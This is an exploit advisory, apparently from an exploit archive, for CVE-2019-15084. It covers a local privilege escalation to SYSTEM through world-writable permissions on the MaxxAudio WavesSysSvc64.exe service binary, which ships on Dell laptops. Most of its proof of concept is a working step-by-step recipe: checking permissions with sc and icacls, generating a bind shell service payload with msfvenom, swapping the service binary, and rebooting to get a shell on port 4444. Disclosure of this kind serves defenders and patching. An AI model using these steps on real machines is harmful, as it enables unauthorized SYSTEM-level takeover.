# Exploit Title: MaxxAudio Drivers WavesSysSvc64.exe File Permissions SYSTEM Privilege Escalation
# Google Dork:
# Date: 2/18/2019
# Exploit Author: Mike Siegel @ml_siegel
# Vendor Homepage: https://maxx.com
# Software Link:
# Version: 184.108.40.206 (May affect other versions)
# Tested on: Win 10 64 bit
# CVE : CVE-2019-15084
MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations.
MaxxAudio drivers version 220.127.116.11 install with incorrect file permissions. As a result a local attacker can escalate to SYSTEM level privileges.
Dell PSIRT has acknowledged the issue and advises updating to a supported driver.
Proof of concept:
1. Validate incorrect permissions.
C:\Users\user> sc qc wavessyssvc
[SC] QueryServiceConfig SUCCESS
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
TAG : 0
DISPLAY_NAME : Waves Audio Services
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Everyone:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
2. Create payload
Create a service payload in msfvenom, transfer to victim:
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe-service -o service.exe
3. Overwrite file.
The file will be in use, you cannot directly overwrite. However you can move the file and replace.
C:\Users\user> move "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe" "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.bak"
C:\Users\user> copy service.exe "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"
4. Reboot the system. Then use netcat or telnet to connect back to 127.0.0.1:4444
This file is embedded in Realtek audio drivers. Dell has since removed this version from their site but it appears to have been released in January 2017.
hash is as follows: cbd0c592c59db94d27ad89db2db7432c0c40db69198d9174eb1bb4bd04e12213 *WavesSysSvc64.exe